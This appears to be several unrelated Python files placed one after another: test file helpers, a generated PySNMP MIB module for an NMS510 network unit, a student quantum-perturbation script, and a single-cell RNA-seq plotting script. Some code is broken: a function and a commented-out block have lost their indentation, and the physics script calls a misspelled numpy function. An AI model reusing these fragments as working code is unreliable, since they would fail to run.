    """Context manager: a temporary file pre-filled with *text*; yields its
    path and removes the file on exit (via tmpfile)."""
    with tmpfile(extension=extension) as filename:
        handle = open(filename, mode=mode)
        try:
            handle.write(text)
        finally:
            # some file-like 'open' substitutes may not provide close()
            try:
                handle.close()
            except AttributeError:
                pass
        yield filename
@contextmanager
def filetexts(d, open=open):
    """ Dumps a number of textfiles to disk

    d - dict
        a mapping from filename to text like {'a.csv': '1,1\n2,2'}
    """
    # Write every file up front, yield the filenames, remove them afterwards.
    for fname, contents in d.items():
        handle = open(fname, 'wt')
        try:
            handle.write(contents)
        finally:
            # tolerate file-like objects without close()
            try:
                handle.close()
            except AttributeError:
                pass
    yield list(d)
    for fname in d:
        if os.path.exists(fname):
            os.remove(fname)
def normalize_to_date(dt):
if isinstance(dt, datetime.datetime) and not dt.time():
return dt.date()
else:
return dt
def assert_allclose(lhs, rhs):
    """Assert element-wise equality across two sequences of rows.

    Floats are compared with np.isclose (NaN counts as equal to NaN);
    midnight datetimes are normalized to dates before comparing.
    """
    for row_pair in map(zip, lhs, rhs):
        for left, right in row_pair:
            if isinstance(left, (np.floating, float)):
                # account for nans
                assert np.all(np.isclose(left, right, equal_nan=True))
            else:
                if isinstance(left, datetime.datetime):
                    left = normalize_to_date(left)
                if isinstance(right, datetime.datetime):
                    right = normalize_to_date(right)
                assert left == right
|
#
# PySNMP MIB module NMS510-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NMS510-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:12:45 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# NOTE(review): generated PySNMP module -- 'mibBuilder' is injected by the
# pysnmp MIB loader when this module is loaded; it is not defined in this file.
# Symbol imports resolved through the MIB builder.
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueSizeConstraint, ConstraintsUnion, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueSizeConstraint", "ConstraintsUnion", "ValueRangeConstraint")
dsu, = mibBuilder.importSymbols("DDS-MIB", "dsu")
gdc, = mibBuilder.importSymbols("GDCCMN-MIB", "gdc")
SCinstance, = mibBuilder.importSymbols("GDCMACRO-MIB", "SCinstance")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectIdentity, Counter64, Bits, Integer32, iso, Gauge32, IpAddress, NotificationType, Counter32, Unsigned32, MibIdentifier, TimeTicks, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectIdentity", "Counter64", "Bits", "Integer32", "iso", "Gauge32", "IpAddress", "NotificationType", "Counter32", "Unsigned32", "MibIdentifier", "TimeTicks", "ModuleIdentity")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# Module root and version scalar (OID subtree 1.3.6.1.4.1.498.8.6).
nms510 = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6))
nms510MIBversion = MibScalar((1, 3, 6, 1, 4, 1, 498, 8, 6, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510MIBversion.setStatus('mandatory')
# Unit configuration table.
nms510UnitCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 8, 6, 2), )
if mibBuilder.loadTexts: nms510UnitCfgTable.setStatus('mandatory')
nms510UnitCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1), ).setIndexNames((0, "NMS510-MIB", "nms510UnitCfgIndex"))
if mibBuilder.loadTexts: nms510UnitCfgEntry.setStatus('mandatory')
nms510UnitCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510UnitCfgIndex.setStatus('mandatory')
nms510DteCtsDelay = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ctsOn", 1), ("cts0mSec", 2), ("ctsFixed3Char", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DteCtsDelay.setStatus('mandatory')
nms510DteCtsDelayExt = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("ext0mSec", 1), ("ext30mSec", 2), ("ext60mSec", 3), ("ext90mSec", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DteCtsDelayExt.setStatus('mandatory')
nms510FirmwareLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510FirmwareLevel.setStatus('mandatory')
nms510AlarmCfgCountWindow = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510AlarmCfgCountWindow.setStatus('mandatory')
nms510SoftReset = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("normal", 1), ("reset", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510SoftReset.setStatus('mandatory')
nms510FrontPanelInhibit = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("fpInhibited", 1), ("fpEnabled", 2), ("execute", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510FrontPanelInhibit.setStatus('mandatory')
nms510FrontPanelEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("fpInhibited", 1), ("fpEnabled", 2), ("execute", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510FrontPanelEnable.setStatus('mandatory')
nms510HdlcInvert = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("normal", 1), ("invert", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510HdlcInvert.setStatus('mandatory')
nms510PiggyBackDetect = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("not-installed", 1), ("installed", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510PiggyBackDetect.setStatus('mandatory')
nms510ExtPortCtrlOut1 = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510ExtPortCtrlOut1.setStatus('mandatory')
nms510ExtPortCtrlOut2 = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 2, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("on", 1), ("off", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510ExtPortCtrlOut2.setStatus('mandatory')
# Alarm object identifiers (subtree ...498.8.6.4).
nms510AlarmData = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4))
nms510NoResponseAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 1))
nms510DiagRxErrAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 2))
nms510PowerUpAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 3))
nms510EEChkSumErrAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 4))
nms510StcLoopbackAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 5))
nms510NoSignalAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 6))
nms510FpTestAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 7))
nms510StreamingAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 8))
nms510DSRLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 9))
nms510DTRLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 10))
nms510DTPLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 11))
nms510DCDLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 12))
nms510RXDLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 13))
nms510TXDLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 14))
nms510DBURequestForScanAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 15))
nms510DBUOnalm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 16))
nms510DBUFailedAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 17))
nms510ExtInputChangeAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 18))
nms510ExtInputLowAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 19))
nms510FrameLossAlm = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 8, 6, 4, 20))
# Alarm configuration table.
nms510AlarmCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 8, 6, 8), )
if mibBuilder.loadTexts: nms510AlarmCfgTable.setStatus('mandatory')
nms510AlarmCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 8, 6, 8, 1), ).setIndexNames((0, "NMS510-MIB", "nms510AlarmCfgIndex"), (0, "NMS510-MIB", "nms510AlarmCfgIdentifier"))
if mibBuilder.loadTexts: nms510AlarmCfgEntry.setStatus('mandatory')
nms510AlarmCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 8, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510AlarmCfgIndex.setStatus('mandatory')
nms510AlarmCfgIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 8, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510AlarmCfgIdentifier.setStatus('mandatory')
nms510AlarmCfgThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 8, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 99))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510AlarmCfgThreshold.setStatus('mandatory')
# Diagnostics configuration table.
nms510DiagCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 8, 6, 6), )
if mibBuilder.loadTexts: nms510DiagCfgTable.setStatus('mandatory')
nms510DiagCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1), ).setIndexNames((0, "NMS510-MIB", "nms510DiagCfgIndex"))
if mibBuilder.loadTexts: nms510DiagCfgEntry.setStatus('mandatory')
nms510DiagCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagCfgIndex.setStatus('mandatory')
nms510DiagSendCode = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("sendOtherPattern", 1), ("send511Pattern", 2), ("send2047Pattern", 3), ("send15BitPattern", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagSendCode.setStatus('mandatory')
nms510DiagTestExceptions = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("noExceptions", 1), ("blocksOutOfRange", 2), ("bitsOutOfRange", 3), ("blocksAndBitsOutOfRange", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagTestExceptions.setStatus('mandatory')
nms510DiagBitErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagBitErrors.setStatus('mandatory')
nms510DiagBlockErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagBlockErrors.setStatus('mandatory')
nms510DiagTestReset = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 6, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("normal", 1), ("diagnostic", 2), ("resetTest", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagTestReset.setStatus('mandatory')
# Diagnostics execution / loopback table.
nms510DiagExcTable = MibTable((1, 3, 6, 1, 4, 1, 498, 8, 6, 7), )
if mibBuilder.loadTexts: nms510DiagExcTable.setStatus('mandatory')
nms510DiagExcEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1), ).setIndexNames((0, "NMS510-MIB", "nms510DiagExcIndex"))
if mibBuilder.loadTexts: nms510DiagExcEntry.setStatus('mandatory')
nms510DiagExcIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagExcIndex.setStatus('mandatory')
nms510DiagIntLineloop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("lineloopOff", 1), ("lineloopOn", 2), ("blocks1", 3), ("blocks10", 4), ("blocks100", 5), ("blocks500", 6), ("blocks1000", 7), ("blocks5000", 8), ("blocks10000", 9), ("blocks50000", 10)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagIntLineloop.setStatus('mandatory')
nms510DiagIntDataloop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("dataloopOff", 1), ("dataloopOn", 2), ("blocks1", 3), ("blocks10", 4), ("blocks100", 5), ("blocks500", 6), ("blocks1000", 7), ("blocks5000", 8), ("blocks10000", 9), ("blocks50000", 10)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagIntDataloop.setStatus('mandatory')
nms510DiagEndToEndSelftest = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("endToEndOff", 1), ("endToEndOn", 2), ("blocks1", 3), ("blocks10", 4), ("blocks100", 5), ("blocks500", 6), ("blocks1000", 7), ("blocks5000", 8), ("blocks10000", 9), ("blocks50000", 10)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagEndToEndSelftest.setStatus('mandatory')
nms510DiagNetworkDelay = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("delayTestOff", 1), ("delayTestOn", 2), ("runDelayTest", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagNetworkDelay.setStatus('mandatory')
nms510DiagTestStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("noTest", 1), ("internalLineloop", 2), ("externalDataloop", 3), ("internalDataloop", 4), ("serviceTestCenterLoop", 5), ("endToend", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nms510DiagTestStatus.setStatus('mandatory')
nms510DiagExtDataloop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 8, 6, 7, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("dataloopOff", 1), ("dataloopOn", 2), ("external", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: nms510DiagExtDataloop.setStatus('mandatory')
mibBuilder.exportSymbols("NMS510-MIB", nms510StreamingAlm=nms510StreamingAlm, nms510PowerUpAlm=nms510PowerUpAlm, nms510ExtPortCtrlOut1=nms510ExtPortCtrlOut1, nms510DiagTestExceptions=nms510DiagTestExceptions, nms510DteCtsDelayExt=nms510DteCtsDelayExt, nms510SoftReset=nms510SoftReset, nms510=nms510, nms510DSRLossAlm=nms510DSRLossAlm, nms510DiagCfgEntry=nms510DiagCfgEntry, nms510DiagBitErrors=nms510DiagBitErrors, nms510DiagExtDataloop=nms510DiagExtDataloop, nms510DTRLossAlm=nms510DTRLossAlm, nms510DiagNetworkDelay=nms510DiagNetworkDelay, nms510DiagEndToEndSelftest=nms510DiagEndToEndSelftest, nms510MIBversion=nms510MIBversion, nms510ExtInputLowAlm=nms510ExtInputLowAlm, nms510UnitCfgTable=nms510UnitCfgTable, nms510ExtInputChangeAlm=nms510ExtInputChangeAlm, nms510AlarmCfgTable=nms510AlarmCfgTable, nms510FirmwareLevel=nms510FirmwareLevel, nms510PiggyBackDetect=nms510PiggyBackDetect, nms510DBUOnalm=nms510DBUOnalm, nms510NoSignalAlm=nms510NoSignalAlm, nms510AlarmCfgEntry=nms510AlarmCfgEntry, nms510AlarmData=nms510AlarmData, nms510DBURequestForScanAlm=nms510DBURequestForScanAlm, nms510DBUFailedAlm=nms510DBUFailedAlm, nms510DiagIntDataloop=nms510DiagIntDataloop, nms510DiagRxErrAlm=nms510DiagRxErrAlm, nms510NoResponseAlm=nms510NoResponseAlm, nms510FrameLossAlm=nms510FrameLossAlm, nms510FrontPanelInhibit=nms510FrontPanelInhibit, nms510FrontPanelEnable=nms510FrontPanelEnable, nms510UnitCfgEntry=nms510UnitCfgEntry, nms510StcLoopbackAlm=nms510StcLoopbackAlm, nms510DTPLossAlm=nms510DTPLossAlm, nms510TXDLossAlm=nms510TXDLossAlm, nms510DiagExcIndex=nms510DiagExcIndex, nms510UnitCfgIndex=nms510UnitCfgIndex, nms510DteCtsDelay=nms510DteCtsDelay, nms510HdlcInvert=nms510HdlcInvert, nms510DiagCfgIndex=nms510DiagCfgIndex, nms510AlarmCfgIdentifier=nms510AlarmCfgIdentifier, nms510AlarmCfgCountWindow=nms510AlarmCfgCountWindow, nms510DiagSendCode=nms510DiagSendCode, nms510DiagTestReset=nms510DiagTestReset, nms510DiagExcEntry=nms510DiagExcEntry, nms510DiagCfgTable=nms510DiagCfgTable, 
nms510EEChkSumErrAlm=nms510EEChkSumErrAlm, nms510AlarmCfgThreshold=nms510AlarmCfgThreshold, nms510DiagTestStatus=nms510DiagTestStatus, nms510DiagIntLineloop=nms510DiagIntLineloop, nms510FpTestAlm=nms510FpTestAlm, nms510DiagBlockErrors=nms510DiagBlockErrors, nms510ExtPortCtrlOut2=nms510ExtPortCtrlOut2, nms510DiagExcTable=nms510DiagExcTable, nms510RXDLossAlm=nms510RXDLossAlm, nms510DCDLossAlm=nms510DCDLossAlm, nms510AlarmCfgIndex=nms510AlarmCfgIndex)
|
'''
Kaya Baber
Physics 440 - Computational Physics
Assignment 4 - Quantum Simulations
Exploration 1
'''
import numpy as np
from numpy import linalg as LA
import matplotlib.pyplot as plt
import math
def make_banded(N):
    """Build the (N-2)x(N-2) tridiagonal second-derivative matrix.

    Grid spacing is h = 1/N; the two boundary points are excluded, leaving
    an interior matrix with -2/h^2 on the diagonal and 1/h^2 on the first
    off-diagonals.
    """
    h = 1.0 / N
    interior = N - 2  # drop the outer ring of indices (boundary points)
    off_diag = [1.0 / (h ** 2)] * (interior - 1)
    main_diag = [-2.0 / (h ** 2)] * interior
    matrix = np.diag(main_diag)
    matrix = matrix + np.diag(off_diag, 1)
    matrix = matrix + np.diag(off_diag, -1)
    return matrix
#continue from exploration 1
#normalize eigan vectors
def normalize(psi):
    """Normalize an eigenvector so its trapezoid-rule integral of psi^2 is 1.

    The integral is approximated as sum(psi^2) / (2 * (len(psi) - 1)).
    """
    squared = psi ** 2
    integral = np.sum(squared) / (2.0 * (len(psi) - 1))
    return psi / (integral ** 0.5)
def V(x, V0):
    """Gaussian perturbing potential V'(x) = V0 * exp(-256 * x^2)."""
    return V0 * math.exp(-256 * (x ** 2))
def perturb(psi, x, V, V0):
    """First-order perturbation-theory energy shift <psi|V'|psi>.

    Weights psi^2 at every grid point by the potential, then integrates
    with the same trapezoid-style rule used in normalize().
    """
    weighted = np.array([(p ** 2) * V(xi, V0) for p, xi in zip(psi, x)])
    deltaE = np.sum(weighted) / (2.0 * (len(psi) - 1))
    return deltaE
# --- Problem setup: eigenstates of the unperturbed well on N grid points ---
N=65
banded = make_banded(N)
x=np.linspace(-0.5,0.5,N) #positions
xArraySub=x[1:-1]  # interior points only (boundaries excluded by make_banded)
eiganVal, eiganVect=LA.eig(banded) #compute eigan vectors and values
numVectors = 50
psiArray=[]
deltaEArray=[]
for i in range(numVectors): #constructs array of eigan vectors
    # Re-attach the two boundary zeros stripped off by make_banded().
    psi=np.insert(eiganVect[:,i],0 ,0)
    psi=np.append(psi,0)
    psi=normalize(psi)
    psiArray.append(psi)
psiNormArray=[]
# NOTE(review): psiArray entries were already normalized above, so this
# second normalize() pass is effectively a no-op.
for p in psiArray:
    psiNorm = normalize(p)
    psiNormArray.append(psiNorm)
# Plot the (unnormalized) eigenvectors 40..49 of the unperturbed well.
# NOTE(review): LA.eig does not sort eigenvalues, so index 40 is not
# guaranteed to correspond to a particular energy level — confirm ordering.
for i in range(40,numVectors):
    psi=np.insert(eiganVect[:,i],0 ,0)  # restore boundary zeros
    psi=np.append(psi,0)
    plt.plot(x, psi)
    plt.ylabel("Psi")
    plt.xlabel("Position (x)")
    plt.title("Unperturbed")
    plt.grid()
    plt.savefig('Assignment_4_quantum_simulation/plots/1eiganVect'+str(i)+'.png',bbox_inches='tight')
    #plt.show()
    plt.clf()
# --- Case A: V0 = 10% of the (assumed) ground-state energy ---
V0=eiganVal[40] / 10.0 #GROUND STATE CHANGES WITH N, RECHECK EACH TIME
# BUG FIX: this was a bare `deltaEArray` expression statement (a no-op);
# the intent was clearly to (re)initialize the list before filling it.
deltaEArray=[]
# Perturbation theory: delta_E_n = <psi_n|V'|psi_n> for each normalized state.
for p in psiNormArray:
    deltaE=perturb(p,x,V,V0)
    deltaEArray.append(deltaE)
newEnergy = np.add(deltaEArray,eiganVal[:numVectors])
# Direct approach: diagonalize the full Hamiltonian H = T + V'.
vArray=[]
for i in xArraySub:
    vArray.append(V(i,V0))
Vdiag=np.diag(vArray)
H = np.add(Vdiag,banded)
eiganValH, eiganVect=LA.eig(H)
# Flip the sign of eigenvector 40 for consistent plotting orientation
# (eigenvectors are only defined up to an overall sign).
eiganVect[:,40] = - eiganVect[:,40]
psiArray=[]
for i in range(40,numVectors): #constructs array of eigan vectors
    psi=np.insert(eiganVect[:,i],0 ,0)
    psi=np.append(psi,0)
    psi=normalize(psi)
    psiArray.append(psi)
    plt.plot(x, psi)
    plt.ylabel("Psi")
    plt.xlabel("Position (x)")
    plt.title("V_0 = 10% of Ground State Energy")
    plt.grid()
    plt.savefig('Assignment_4_quantum_simulation/plots/2AeiganVect'+str(i)+'.png',bbox_inches='tight')
    #plt.show()
    plt.clf()
# --- Case B: V0 = the full (assumed) ground-state energy ---
V0=eiganVal[40] #GROUND STATE CHANGES WITH N, RECHECK EACH TIME
deltaEArray=[]
for p in psiNormArray:
    deltaE=perturb(p,x,V,V0)
    deltaEArray.append(deltaE)
newEnergy2 = np.add(deltaEArray,eiganVal[:numVectors])
# Direct diagonalization of H = T + V' for comparison.
vArray=[]
for i in xArraySub:
    vArray.append(V(i,V0))
Vdiag=np.diag(vArray)
H = np.add(Vdiag,banded)
eiganValH2, eiganVect=LA.eig(H)
# Plot the perturbed eigenvectors for case B.
psiArray=[]
for i in range(40,numVectors): #constructs array of eigan vectors
    psi=np.insert(eiganVect[:,i],0 ,0)
    psi=np.append(psi,0)
    psi=normalize(psi)
    psiArray.append(psi)
    plt.plot(x, psi)
    plt.ylabel("Psi")
    plt.xlabel("Position (x)")
    plt.title("V_0 = Ground State Energy")
    plt.grid()
    plt.savefig('Assignment_4_quantum_simulation/plots/2BeiganVect'+str(i)+'.png',bbox_inches='tight')
    #plt.show()
    plt.clf()
print "V0 = 10 % of Groundstate\nPertubation Theory:"
print np.array(newEnergy[40:])
print "Computed:"
print eiganValH[40:50]
print "Difference:"
print np.substract(np.array(newEnergy[40:]),eiganValH[40:50])
print "V0 = Groundstate\nPertubation Theory:"
print np.array(newEnergy2[40:])
print "Computed:"
print eiganValH2[40:50]
print "Difference:"
print np.subtract(np.array(newEnergy2[40:]),eiganValH2[40:50])
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 1 16:32:44 2018
@author: dawnstear
"""
import numpy as np
import pandas as pd
from utils import Data
from dimred import DimensionReduction
'''
import pyqtgraph as pg
from pyqtgraph.Qt import QtGui, QtCore
pg.setConfigOption('leftButtonPan', False) # set for mac users only,,, put in __main__?
## Switch to using white background and black foreground
pg.setConfigOption('background', 'w')
#pg.setConfigOption('foreground', 'k')
'''
''' find out how button/lists work to do drop down choiceof dim/red and make that plot it'''
# Window toggles for the pyqtgraph demo code (currently commented out below).
win1=1
win2=0
win3=0
# Load the single-cell expression matrix; rows are cells, columns are genes
# plus the 'TYPE' and 'Labels' metadata columns.
data1k = pd.read_csv('/Users/dawnstear/desktop/Mid_Atlantic_Poster/sc_data/n_1078/data.csv')
print(np.shape(data1k))
celltypes = data1k['TYPE'] # save cell type vector in case we need it later
labels = data1k['Labels'] # save labels
data_ = data1k.drop(['Labels','TYPE'],axis=1)
cellcount, genecount = np.shape(data_)
X = data_
y = labels
Utils = Data(X,y)
dr = DimensionReduction(X,y,dataset='1,078')
#pca_data = dr.pca(n_components=2)
# Run locally linear embedding on the expression matrix.
lle_data = dr.lle()
'''
# Overhead code
app = QtGui.QApplication([])
mw = QtGui.QMainWindow()
mw.resize(800,800)
view = pg.GraphicsLayoutWidget() ## GraphicsView with GraphicsLayout inserted by default
mw.setCentralWidget(view)
mw.show()
mw.setWindowTitle('Single-Cell RNA-seq scatter plot')
n = 50
## Make all plots clickable
lastClicked = []
def clicked(plot, points):
global lastClicked
for p in lastClicked:
p.resetPen()
print("clicked points", points)
for p in points:
p.setPen('b', width=2)
lastClicked = points
if win1:
# Add plot to GraphicsLayoutWidget
w1 = view.addPlot()
# Add Scatter plot to GraphicsLayoutWidget
s1 = pg.ScatterPlotItem(size=20, pen=pg.mkPen(None),
brush=pg.mkBrush(255, 255, 255, 80))
pos = np.random.normal(size=(2,n), scale=1e-5)
spots = [{'pos': pos[:,i], 'data': 1} for i in range(n)] + [{'pos': [0,0], 'data': 1}]
s1.addPoints(spots)
w1.addItem(s1)
# Add label to GraphicsLayoutWidget
l1 = view.addLabel('CELLS',row=10,col=20)
s1.sigClicked.connect(clicked)
if win2:
w2 = view.addPlot()
s2 = pg.ScatterPlotItem(size=10, pen=pg.mkPen('w'), pxMode=True)
pos = np.random.normal(size=(2,n), scale=1e-5)
spots = [{'pos': pos[:,i], 'data': 1, 'brush':pg.intColor(i, n),
'symbol': i%5, 'size': 5+i/10.} for i in range(n)]
s2.addPoints(spots)
w2.addItem(s2)
s2.sigClicked.connect(clicked)
if win3:
w3 = view.addPlot()
s3 = pg.ScatterPlotItem(pxMode=False) ## Set pxMode=False to allow spots to transform with the view
spots3 = []
for i in range(10):
for j in range(10):
